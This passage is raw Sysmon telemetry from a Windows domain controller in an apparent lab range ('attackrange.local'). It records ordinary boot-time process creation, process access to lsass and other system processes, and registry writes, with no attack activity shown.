13:09:28.072{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:27.947{08A6967A-4286-6000-0A00-000000009A01}844936C:\Windows\system32\services.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:27.947{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:27.947{08A6967A-4286-6000-0A00-000000009A01}844848C:\Windows\system32\services.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+19e30|C:\Windows\system32\services.exe+19b29|C:\Windows\system32\services.exe+1d91b|C:\Windows\system32\services.exe+22933|C:\Windows\system32\services.exe+23dec|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:27.955{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:27.947{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:27.369{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database EpochDWORD (0x00001091) 10341000x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.853{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.853{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.853{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.838{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25dfa|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.838{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.525{08A6967A-4286-6000-0B00-000000009A01}852856C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+4e37c|C:\Windows\system32\lsasrv.dll+56c8f|C:\Windows\system32\lsasrv.dll+620fe|C:\Windows\system32\lsass.exe+2086|C:\Windows\system32\lsass.exe+1e11|C:\Windows\system32\lsass.exe+1551|C:\Windows\system32\lsass.exe+4708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.432{08A6967A-4286-6000-0700-000000009A01}708712C:\Windows\system32\wininit.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1000000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wininit.exe+b9e0|C:\Windows\system32\wininit.exe+94ff|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.432{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.432{08A6967A-4286-6000-0700-000000009A01}708712C:\Windows\system32\wininit.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+8c5f|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.434{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\System32\lsass.exe10.0.14393.2580 (rs1_release_inmarket.181009-1745)Local Security Authority ProcessMicrosoft® Windows® Operating SystemMicrosoft Corporationlsass.exeC:\Windows\system32\lsass.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=5AE8589CDDE46ED132AEF8280BC8894A,SHA256=D957A03C6EA35CBF0C90B0B088DF07E7803A1A3EEB4BA889038F88DB066BBDC4,IMPHASH=0AA67FE637515AC7535797573607EAA2{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.385{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.385{08A6967A-4286-6000-0700-000000009A01}708712C:\Windows\system32\wininit.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\wininit.exe+94d2|C:\Windows\system32\wininit.exe+5977|C:\Windows\system32\wininit.exe+4b9b|C:\Windows\system32\wininit.exe+546c|C:\Windows\system32\wininit.exe+cb13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000720Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.384{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exe10.0.14393.3383 (rs1_release.191125-1816)Services and Controller appMicrosoft® Windows® Operating SystemMicrosoft Corporationservices.exeC:\Windows\system32\services.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=457FD1B4ED8D29816560345AE5BA9B73,SHA256=D99AA02447946EFB935B11D21DF99AFDDA0955A588D6AAC42746DE73E1253956,IMPHASH=264C7CFAFE91682E421A605C58E86E40{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\System32\wininit.exewininit.exe 10341000x8000000000000000719Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.307{08A6967A-4286-6000-0600-000000009A01}700704C:\Windows\System32\smss.exe{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000718Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.307{08A6967A-4286-6000-0900-000000009A01}800C:\Windows\System32\winlogon.exe10.0.14393.3204 (rs1_release.190830-1500)Windows Logon ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWINLOGON.EXEwinlogon.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e71SystemMD5=DEA4CE12F24601830083126E18A2C7C9,SHA256=F002F8C2EA49D21F242996E3D57F5FDD7995FE6DB524BB69BBD7F190CC0211A9,IMPHASH=3CF10D94C117DB4F6E9D523B93429D6D{08A6967A-4286-6000-0600-000000009A01}700C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c 10341000x8000000000000000717Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.291{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{08A6967A-4286-6000-0800-000000009A01}716C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000716Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.229{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Domainattackrange.local 13241300x8000000000000000715Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.229{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Hostnamewin-dc-250 10341000x8000000000000000714Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.229{08A6967A-4286-6000-0400-000000009A01}628632C:\Windows\System32\smss.exe{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+1d5e|\SystemRoot\System32\smss.exe+1b09|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000713Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.229{08A6967A-4286-6000-0700-000000009A01}708C:\Windows\System32\wininit.exe10.0.14393.2273 (rs1_release_1.180427-1811)Windows Start-Up ApplicationMicrosoft® Windows® Operating SystemMicrosoft CorporationWinInit.exewininit.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=5A998F811D7805B79B8E769027F62FD2,SHA256=8694C5732D26921EEA29589A9FA4182139EF3D9EA6B6D0ACCA8994B4AA5DEFE5,IMPHASH=C8D526C4E61942E1B11AE4B7EE2DDE5D{08A6967A-4286-6000-0400-000000009A01}628C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000bc 0000007c 10341000x8000000000000000712Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.229{08A6967A-4286-6000-0600-000000009A01}700704C:\Windows\System32\smss.exe{08A6967A-4286-6000-0800-000000009A01}716C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000711Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.233{08A6967A-4286-6000-0800-000000009A01}716C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft CorporationCSRSS.Exe%%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e71SystemMD5=955E9227AA30A08B7465C109B863B886,SHA256=D896480BC8523FAD3AE152C81A2B572022C3778A34A6D85E089D150A68E9165E,IMPHASH=273BC9D936389D79244E6E56BE5096B6{08A6967A-4286-6000-0600-000000009A01}700C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c 10341000x8000000000000000710Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.229{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{08A6967A-4286-6000-0600-000000009A01}700C:\Windows\System32\smss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000709Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.213{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{08A6967A-4286-6000-0600-000000009A01}700C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+2042|\SystemRoot\System32\smss.exe+36ee|\SystemRoot\System32\smss.exe+c18e|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000708Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.227{08A6967A-4286-6000-0600-000000009A01}700C:\Windows\System32\smss.exe10.0.14393.2969 (rs1_release.190503-1820)Windows Session ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationsmss.exe\SystemRoot\System32\smss.exe 000000d8 0000007c C:\Windows\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e71SystemMD5=725EC50D4B0F607BF5B45B5E0115770B,SHA256=56881BCAEAC350107A6453F38F020FE0E284DBE2E8A6F37ED482985E0DD98EA7,IMPHASH=09DDECA5943933973FE7DDDD24ED724A{08A6967A-4284-6000-0200-000000009A01}452C:\Windows\System32\smss.exe\SystemRoot\System32\smss.exe 10341000x8000000000000000707Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.213{08A6967A-4284-6000-0200-000000009A01}452460C:\Windows\System32\smss.exe{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\system32\csrss.exe0x101441C:\Windows\SYSTEM32\ntdll.dll+a6624|\SystemRoot\System32\smss.exe+3fee|\SystemRoot\System32\smss.exe+3b53|C:\Windows\SYSTEM32\ntdll.dll+1d3f1|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000706Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.150{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\VolatileSettings\{5b45201d-f2f2-4f3b-85bb-30ff1f953599}Binary Data 13241300x8000000000000000705Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.150{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\system32\csrss.exeHKLM\System\CurrentControlSet\Services\BasicDisplay\Video\ServiceBasicDisplay 13241300x8000000000000000704Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.150{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000703Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.150{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\CountDWORD (0x00000001) 13241300x8000000000000000702Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:26.150{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\monitor\Enum\0DISPLAY\Default_Monitor\4&69f2b1a&0&UID0 10341000x8000000000000000701Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.104{08A6967A-4286-6000-0400-000000009A01}628632C:\Windows\System32\smss.exe{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\SYSTEM32\ntdll.dll+8bf9e|C:\Windows\SYSTEM32\ntdll.dll+8bd49|\SystemRoot\System32\smss.exe+2795|\SystemRoot\System32\smss.exe+1ee4|\SystemRoot\System32\smss.exe+20a1|\SystemRoot\System32\smss.exe+1c92|\SystemRoot\System32\smss.exe+1af6|\SystemRoot\System32\smss.exe+14cb|\SystemRoot\System32\smss.exe+130f|\SystemRoot\System32\smss.exe+1096|C:\Windows\SYSTEM32\ntdll.dll+5179f 154100x8000000000000000700Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:26.112{08A6967A-4286-6000-0500-000000009A01}636C:\Windows\System32\csrss.exe10.0.14393.2969 (rs1_release.190503-1820)Client Server Runtime ProcessMicrosoft® Windows® Operating SystemMicrosoft 